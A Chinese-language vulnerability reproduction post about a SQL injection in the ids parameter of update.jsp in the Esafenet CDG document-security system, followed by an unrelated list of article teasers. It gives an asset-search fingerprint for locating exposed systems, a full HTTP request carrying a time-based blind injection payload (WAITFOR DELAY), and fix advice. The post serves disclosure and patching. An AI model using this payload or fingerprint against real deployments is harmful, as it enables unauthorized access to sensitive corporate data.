某电子文档安全管理系统 SQL注入漏洞复现

漏洞介绍

亿赛通电子文档安全管理系统 (简称: CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。

由于亿赛通电子文档安全管理系统 update.isp处的ids参数处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,可通过注入漏洞获取数据库敏感信息。

资产测绘

app=“亿赛通-电子文档安全管理系统”

漏洞复现

GET /CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1%2C3%29%3BWAITFOR+DELAY+%270%3A0%3A3%27-- HTTP/1.1
Host: 
Cache-Control: max-age=0
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

在这里插入图片描述

修复建议

1.数据库查询代码使用预编译语法
2.部署Web应用防火墙,对数据库操作进行监控

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/236588.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

RHCE8 资料整理(十二)

RHCE8 资料整理 第 33 章 jinja2模板的使用31.1 if 判断33.2 for循环33.3 handlers 第 33 章 jinja2模板的使用 详细参考 https://blog.csdn.net/u010230019/article/details/128561872 https://blog.csdn.net/u010230019/article/details/128477679 假设目前Nginx的配置文件在…

未来仓储新玩法小空间做大文章

身处智能消费时代的大家都应该有深刻感受,物流速度在逐年增快。根据国家邮政局预估,2020 年快递业务吞吐量超 740 亿件,同比增长 18%。 面对日益增加的商品交付量,不得不重新定义产品分销方式,从而满足当今互联网消费…

从零开始学HBase:打造你的大数据技能库!

介绍:HBase是一个分布式的、面向列的开源数据库,源于Fay Chang所撰写的Google论文“Bigtable:一个结构化数据的分布式存储系统”。类似于Bigtable利用了Google文件系统(File System)提供的分布式数据存储,H…

<八>JavaScript中的对象及对像的增删改查

使用基本数据变量所创建的变量都是独立的,不能成为一个整体,对象属于复合型的数据类型,在对象中可以保存多个不同的数据类型的属性。 一、对象的分类 1.1内建对象 由ES标准中定义的对象 比如:Match、String、Number、Boolean、…

【Qt】Qt Creator 警告: Unused parameter ‘xxx‘

1. 问题 Qt开发中,有些函数参数没有使用,会报Unused parameter xxx警告,这个警告不影响代码正常运行。 2. 屏蔽这个警告的方法 2.1 方法1 函数中添加 Q_UNUSED(arg); TestClass::TestClass(QObject *parent) {Q_UNUSED(parent); }2.2 方…

【AI-2】深度学习框架详解

目前,有许多流行的深度学习框架可供选择,下面列举一些常见的深度学习框架: TensorFlow(Google) TensorFlow:由Google开发的开源深度学习框架,提供了丰富的工具和库,支持各种深度学…

IP查询类API接口查询,含各精度IP归属地查询接口

IP查询 IP归属地-IPv4高精版:根据IP地址查询归属地信息,支持到中国地区(不含港台地区)街道级别,包含国家、省、市、区县、详细地址和运营商等信息。IP归属地-IPv4区县级:根据IP地址查询归属地信息&#xf…

华为atlas300安装教程

1、安装包位置: /data/ai_install_packages 2、添加HwHiAiUser用户: groupadd -g 1000 HwHiAiUser useradd -g HwHiAiUser -u 1000 -d /home/HwHiAiUser -m HwHiAiUser -s /bin/bash 3、安装驱动: ./Ascend-hdk-310p-npu-driver_6.0.0_l…

前端FLV视频直播解决方案

项目背景: 1. 后台给出一个地址,持续不断的推送flv视频流。 2.前端需要接收视频流,并寻找合适的播放插件。 一开始: 其实用的是xgplayer(西瓜视频)。 官网地址:西瓜播放器 使用的是直播&a…

【10大专题,2.8w字详解】:从张量开始到GPT的《动手学深度学习》要点笔记

《动手学深度学习PyTorch版》复习要点全记录 📘 🎯 专注于查漏补缺、巩固基础,这份笔记将带你深入理解深度学习的核心概念。通过一系列精心整理的小专题,逐步构建起你的AI知识框架。 🧠 从最基础的张量操作&#xff0c…

DELL MD3600F更换控制器电池

1、存储左上角闪红灯,管理软件提示控制器1电池故障,需取出控制器更换上新电池。 2、通过管理软件确认两个控制器编号;确认到下面的是控制器1 3、拔掉控制器上插的线(SAS线、网线、光纤线),打好标签&#xf…

外贸SEO建站系统有哪些?海洋建站的优势?

外贸SEO建站怎么做比较好?如何做谷歌独立站SEO优化? 外贸企业越来越需要建立自己的在线形象,以吸引更多的潜在客户。而要实现这一目标,外贸SEO建站系统是一种非常有效的手段。那么,外贸SEO建站系统有哪些呢&#xff1…

常见 平滑函数

平滑函数是指具有较为连续和缓和性质的数学函数。这类函数通常在局部小范围内变化不大,避免了突变或者急剧的波动。以下是一些常见的平滑函数: 高斯函数(Gaussian Function) 高斯函数是一种常见的平滑函数,具有钟形曲…

LeetCode day28

LeetCode day28 由于一点小意外,今天就来搞搞滑动窗口(ง •_•)ง 1423. 可获得的最大点数 几张卡牌 排成一行,每张卡牌都有一个对应的点数。点数由整数数组 cardPoints 给出。 每次行动,你可以从行的开头或者末尾拿一张卡牌,…

五、从0开始卷出一个新项目瑞萨RZN2L之RZT2L BaseProject coremark的移植

感谢来自b站热心帅气的同学分享的RZT2L移植经验总结的md文档 1 需要注意的小点 1.1 使用Flash运行调试前,新板子需要erase 1.2 在线debug,需要修改startup.c 2 coremark工程建立 2.1 工程创建 2.2 src 用户c代码移植 2.3 debug调试 …

HAL TIM2的PWM

main函数跑下面代码就行 懂的就懂,不讲原理,自己看 MX_TIM2_Init(7,999);__HAL_TIM_SET_COMPARE(&htim2,TIM_CHANNEL_1,500);__HAL_TIM_SET_COMPARE(&htim2,TIM_CHANNEL_2,500);__HAL_TIM_SET_COMPARE(&htim2,TIM_CHANNEL_3,500);__HAL_TIM_…

<sa8650>sa8650 qcxser-之-串行解串器ADC使用

<sa8650>sa8650 qcxser-之-串行解串器GPIO输入输出 <sa8650>sa8650 qcxser-之-串行解串器GPIO的map <sa8650>sa8650 qcxser-之-串行解串器ERRB的map <sa8650>sa8650 qcxser-之-串行解串器ADC使用 <sa8650>sa8650 qcxser-之-串行解串器ADC使用 一 前言二 ADC配置三 验…

SpringBoot数据校验

后端在进行数据请求时,通常会校验前端传递过来的参数是否是空值或者是null。通常会通过if判断值是否满足条件,不满足就返回。但如果前端传递的是表单,那么要进行判断的条件就比较多了,太多的if会让代码变得臃肿,而且也…

DshanMCU-R128s2芯片手册与资料

CPU手册 Arm Cortex-M33 核心手册: Arm Cortex-M33 Processor Technical Reference ManualXuanTie C906 核心手册:T-Head XuanTie C906 Processor Datasheet DSP 相关 HIFI 5 DSP 相关:HiFi 5 DSPXtensa Xplorer 下载地址:Xplo…

【python】进阶--->网络编程(一)

一、网络编程 网络 : 为了联络多方然后进行通信,将数据从一方传递给另一方. 网络协议 : 不同计算机只需要通过联网,那么就可以相互进行传递数据,那么不同种类的计算机之间就和不同语言的人之间沟通一样,需要一种大家都认可都遵循的协议即可. 那么计算机都遵循的网络通信协议叫…